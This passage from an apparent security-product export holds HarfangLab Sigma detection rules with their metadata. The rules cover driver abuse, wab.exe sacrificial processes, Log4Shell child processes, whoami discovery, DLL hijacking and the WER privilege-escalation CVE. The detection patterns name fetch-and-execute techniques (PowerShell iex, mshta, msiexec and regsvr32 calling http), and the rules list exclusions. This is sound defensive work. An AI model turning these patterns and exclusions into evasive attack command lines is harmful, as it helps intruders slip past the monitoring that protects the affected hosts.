classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n OriginalFileName: 'IObitUnlocker.sys'\n\n # This is handled by the rule 79f2b027-0261-441e-a1d1-d569515a7c9b\n filter_image:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "09c303fe-d535-4d15-9f45-17f91b3e39fc", "rule_name": "Renamed IObit Unlocker Driver Loaded", "rule_description": "Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\nThis driver driver has been abused by adversaries to disable security tools and evade detection.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n", "rule_creation_date": "2023-09-19", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "09e88047-86aa-4e82-a0bb-4d8613732d6a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.616726Z", "creation_date": "2026-03-23T11:45:34.616729Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.616737Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1055_sacrificial_process_wab.yml", "content": "title: Wab.exe Sacrificial Process Spawned\nid: 09e88047-86aa-4e82-a0bb-4d8613732d6a\ndescription: |\n Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n It is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/22\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Program Files\\Windows Mail\\wab.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "09e88047-86aa-4e82-a0bb-4d8613732d6a", "rule_name": "Wab.exe Sacrificial Process Spawned", "rule_description": "Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nIt is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\n", "rule_creation_date": "2024-03-22", "rule_modified_date": "2025-02-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.073376Z", "creation_date": "2026-03-23T11:45:34.073377Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.073382Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/", "https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", "https://attack.mitre.org/versions/v10/techniques/T1190/" ], "name": "t1190_log4j_vulnerability_exploitation.yml", "content": "title: Suspicious Process Spawned by Java Application\nid: 09f74bd7-74d5-4ebb-bdda-430f8cf9a81f\ndescription: |\n Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\n This critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\n It is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\nreferences:\n - https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/\n - https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\n - https://attack.mitre.org/versions/v10/techniques/T1190/\ndate: 2021/12/20\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Java\n - classification.Windows.Exploit.Log4Shell\n - classification.Windows.Exploit.CVE-2021-44228\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n - ParentImage|endswith: '\\cmd.exe'\n GrandparentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n\n selection_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'iex'\n - 'invoke-expression'\n - 'Start-Process'\n - 'New-Object -ComObject'\n - '*^*^*^*'\n\n selection_msiexec:\n Image|endswith: '\\msiexec.exe'\n CommandLine|contains: 'http'\n\n selection_mshta:\n Image|endswith: '\\mshta.exe'\n CommandLine|contains: 'http'\n\n selection_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n CommandLine|contains: 'http'\n\n selection_rundll32:\n Image|endswith: '\\rundll32.exe'\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n selection_hh:\n Image|endswith: '\\hh.exe'\n CommandLine|contains: 'http'\n\n selection_schtasks:\n Image|endswith: '\\schtasks.exe'\n CommandLine|contains: '/create'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'powershell.exe -Command & {Start-Process -FilePath `\"?:\\KineQuantum\\steamvrredist\\bin\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files (x86)\\'\n - '/tr ?:\\Apple\\Local\\Library\\WebObjects\\Applications\\'\n - '/tr ??:\\Program Files\\'\n - '/tr ??:\\Program Files (x86)\\'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some Java applications may spawn a legitimate process.\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f", "rule_name": "Suspicious Process Spawned by Java Application", "rule_description": "Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\nThis critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\nIt is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\n", "rule_creation_date": "2021-12-20", "rule_modified_date": "2025-05-27", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.initial_access" ], "rule_technique_tags": [ "attack.t1190" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622840Z", "creation_date": "2026-03-23T11:45:34.622842Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622846Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1033/" ], "name": "t1033_whoami_windows.yml", "content": "title: Current Username Discovered via Whoami (Windows)\nid: 0a3934f6-2b4c-4fb0-81ea-2601e7665b3a\ndescription: |\n Detects the execution of whoami.exe.\n This command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_commandline:\n CommandLine:\n - 'whoami'\n - 'whoami ?all'\n - 'whoami ?priv'\n - 'whoami ?groups'\n - 'whoami.exe'\n - 'whoami.exe ?all'\n - 'whoami.exe ?priv'\n - 'whoami.exe ?groups'\n ParentImage|contains: '?'\n\n # This is handled by the rule 77575317-f87a-49a1-b295-f2a7a23f75d4\n filter_system:\n IntegrityLevel: 'System'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_grandparentimage:\n GrandparentImage|endswith:\n # IBM i Access Client Solutions\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_msys2:\n Image: '?:\\msys64\\usr\\bin\\whoami.exe'\n ParentImage:\n - '?:\\msys64\\usr\\bin\\bash.exe'\n - '?:\\msys64\\usr\\bin\\sh.exe'\n\n exclusion_ms_monitoring_agent:\n # grandparent: C:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs 0 {B87E55DB-EA55-993D-FA42-5A4B215D0593} {59E3FB68-8F43-D96C-1EF9-EE090EDDD8E6} false xxx_domain_name_xxx yyyyy 11001 21001\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs '\n CurrentDirectory|startswith: '?:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State'\n\n exclusion_palo_alto:\n # C:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & C:\\windows\\System32\\whoami.exe /groups\n # but for whatever reason, we don't have the grandparentinfo (PanGpHip.exe)\n CommandLine: '?:\\windows\\System32\\whoami.exe /groups' # 1 space before /groups\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & ?:\\windows\\System32\\whoami.exe /groups' # 2 spaces before /groups\n\n exclusion_podman:\n GrandparentImage|endswith: '\\Podman Desktop.exe'\n ParentCommandLine: 'powershell.exe $null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object {$_.SID -eq \"S-1-5-32-544\"})'\n\n exclusion_cygwin:\n Image|endswith: '\\cygwin64\\bin\\whoami.exe'\n ParentImage|endswith: '\\cygwin64\\bin\\bash.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\postgresql-*.*-*-windows-x64.exe|'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe|'\n - '|?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe|'\n\n exclusion_schedule:\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a", "rule_name": "Current Username Discovered via Whoami (Windows)", "rule_description": "Detects the execution of whoami.exe.\nThis command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n", "rule_creation_date": "2021-03-15", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1033", "attack.t1069" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098031Z", "creation_date": "2026-03-23T11:45:34.098033Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098037Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://twitter.com/an0n_r0/status/1544472352657915904", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_iexpress.yml", "content": "title: DLL Hijacking via IEXPRESS.exe\nid: 0a4830e7-82c9-4ac1-b846-a68dc4caa7ab\ndescription: |\n Detects potential Windows DLL Hijacking via IEXPRESS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IEXPRESS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab", "rule_name": "DLL Hijacking via IEXPRESS.exe", "rule_description": "Detects potential Windows DLL Hijacking via IEXPRESS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.588153Z", "creation_date": "2026-03-23T11:45:34.588157Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.588165Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_label.yml", "content": "title: DLL Hijacking via label.exe\nid: 0a4bf049-476a-4f76-b1ff-c92e630ba3ea\ndescription: |\n Detects potential Windows DLL Hijacking via label.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'label.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea", "rule_name": "DLL Hijacking via label.exe", "rule_description": "Detects potential Windows DLL Hijacking via label.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a708087-9ef8-4db8-b5a9-84d30391d776", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591044Z", "creation_date": "2026-03-23T11:45:34.591047Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591055Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_mdsched.yml", "content": "title: DLL Hijacking via mdsched.exe\nid: 0a708087-9ef8-4db8-b5a9-84d30391d776\ndescription: |\n Detects potential Windows DLL Hijacking via mdsched.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdsched.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\bcd.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0a708087-9ef8-4db8-b5a9-84d30391d776", "rule_name": "DLL Hijacking via mdsched.exe", "rule_description": "Detects potential Windows DLL Hijacking via mdsched.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0a956b02-3359-4969-9418-cfa7e8279f9e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.609800Z", "creation_date": "2026-03-23T11:45:34.609803Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.609811Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874", "https://attack.mitre.org/techniques/T1068/" ], "name": "t1068_wer_service_vulnerability.yml", "content": "title: WER Service CVE-2023-36874 Vulnerability Exploited\nid: 0a956b02-3359-4969-9418-cfa7e8279f9e\ndescription: |\n Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\n Microsoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\n It is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\nreferences:\n - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/08/24\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-36874\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-36874\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n # C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wercplsupport\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'wercplsupport'\n\n filter_signed:\n OriginalFileName: 'WerMgr'\n ProcessSigned: 'true'\n 